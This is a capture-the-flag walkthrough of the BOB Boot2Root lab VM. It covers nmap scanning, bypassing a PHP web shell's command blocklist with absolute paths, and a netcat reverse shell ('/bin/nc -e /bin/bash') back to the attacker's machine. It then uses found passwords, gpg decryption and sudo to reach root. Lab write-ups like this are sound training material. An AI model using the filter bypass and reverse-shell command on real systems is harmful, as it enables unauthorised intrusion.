Bob C0rruptedb1t

July 10, 2018   

Introduction

Today we are going to look at how I solved the BOB Boot2Root from C0rruptedb1t / Vulnhub. This is a fairly simple challenge as far as skill goes but it requires strong logic and problem solving skills. You really need to think outside the box with this one. I have chosen the VM from the c0rruptedb1t website as it appears to be the most up to date version.

VM Info

Name: BOB Author: c0rruptedb1t
Link: http://c0rruptedb1t.ddns.net/vms/bob.html
Difficulty: Beginner
Networking: Host Only (192.168.21.130)

Discovery

First off we need to find the VM on our network. Since the BOB VM and my Kali VM are both connected via host only networking I know that they are both on the 192.168.21.0/24 range so I fire off a quick nmap ping only scan to see if anything responds.

nmap -sn 192.168.21.0/24

Great I know that 192.168.21.129 is my Kali VM so 192.168.21.130 must be the BOB VM.
Lets take a look at what ports are open with an nmap port scan

nmap -v -sS -A -T4 --reason -oA target_syn --webxml -p- 192.168.21.130

Lets break this down so we know what’s going on.

Parameter Reason
-v Verbose output
-sS TCP SYN scan
-A Enable OS detection, version detection, script scanning, and traceroute
-T4 Aggressive scanning
–reason Show host and port state reasons
-oA target_syn All output formats and name the file target_syn
–webxml Also generate a webxml report
-p- Scan all TCP ports

Once NMAP has finished doing its thing we will find target_syn.xml in our working directory along with the other output formats should we need them.

Port Description
80 Apache web server
25468 SSH

We have 2 ports open. A webserver on port 80 and SSH on port 25468.
The report also tells us that a robots.txt was found with the following entries.

  • /login.php (404)
  • /dev_shell.php

dev_shell

  • /lat_memo.html
Memo sent at GMT+10:00 2:37:42 by User: Bob
Hey guys IT here don't forget to check your emails regarding the recent security breach. There is a web shell running on the server with no protection but it should be safe as I have ported over the filter from the old windows server to our new linux one. Your email will have the link to the shell.

-Bob
  • /passwords.html
Really who made this file at least get a hash of your password to display, hackers can't do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob 

At this point we could try more content discovery, but it’s looking like we have everything we need here to get our foothold in this machine.

Initial shell

After some playing around with the ‘dev shell’ I noticed that if we type some commands such as nc, netcat and ls we are presented with the message “Get out skid lol.” This reflects the lat_memo.html that claims there is some kind of filter in place. The filter does appear to to have a flaw though as it does not take into account absolute paths, meaning we can bypass it with /bin/ls and get a directory listing returned.

WIP.jpg about.html contact.html dev_shell.php dev_shell.php.bak dev_shell_back.png index.html index.html.bak lat_memo.html login.html news.html passwords.html robots.txt school_badge.png 

dev_shell.php.bak
Brilliant they have left a backup of dev_shell.php that we can download and take a look at.

<html>
<body>
  <?php
    //init
    $invalid = 0;
    $command = ($_POST['in_command']);
    $bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
  ?>
  <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
      #shell{
        color: white;
        text-align: center;
    }
  </style>
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    <?php
    system("running command...");
      //executes system Command
      //checks for sneaky ;
      if (strpos($command, ';') !==false){
        system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
      }
      else{
        $is_he_a_bad_man = explode(' ', trim($command));
        //checks for dangerous commands
        if (in_array($is_he_a_bad_man[0], $bad_words)){
          system("echo Get out skid lol");
        }
        else{
          system($_POST['in_command']);
        }
      }
    ?>
  </div>
    <img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

We can see from the PHP code that the list of bad words is pwd, ls, netcat, ssh, wget, ping, traceroute, cat, nc also if there is a semicolon ( ; ) anywhere in our command then it will also fail with the message “echo Nice try skid, but you will never get through this bulletproof php code”

Knowing that we can bypass the filter by using an absolute path, we can use which nc to see if netcat exists on the machine and what is it’s absolute path which is ‘/bin/nc’ With this information we can build our command to get a simple netcat reverse shell. First of all we need to set up a listener on our Kali VM.

netcat -nvlp 4444

and then we can run our command in the PHP dev shell

/bin/nc -e /bin/bash 192.168.21.129 4444

In the asciicast you’ll see I ran python -c 'import pty; pty.spawn("/bin/bash")' this upgrades us to a tty(ish) bash shell rather than the dumb netcat shell we get initially.

Getting The SSH Logins

Now we have our shell we can go exploring, there are a lot of random files laying around in the users home directories, bob is the boss so it’s most likely that getting the bob account will lead to root, lets start with his home folder.
After some rummaging around we find some interesting files

  • /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
  • /home/bob/.old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
  • /home/bob/Documents/login.txt.gpg (ENCRYPTED)
  • /home/bob/Documents/staff.txt
Seb:

Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him

James:

Does nothing
Pretty Lazy
Doesn't give a shit about his job

Elliot:

Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired

.old_passwordfile.html contains 2 SSH logins, great, lets log in as the regular user ‘jc’ with password ‘Qwerty’

Long Story Short

I’ll admit here is where I got stuck so I ended up Googling for a hint. I read that taking the first letter from each line of the notes.sh file will give us the password for the login.txt.gpg file. To be honest I probably would never have got to that in a million years. Anyway let’s continue down that path, with the password HARPOCRATES

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

OK! We have bob’s password b0bcat_ so we can su to become bob.

Now we are bob we run ìd and can see he is in the sudo group so we can sudo -s and again enter bob’s password to become root.

All that is left is to cat /flag.txt and we are done!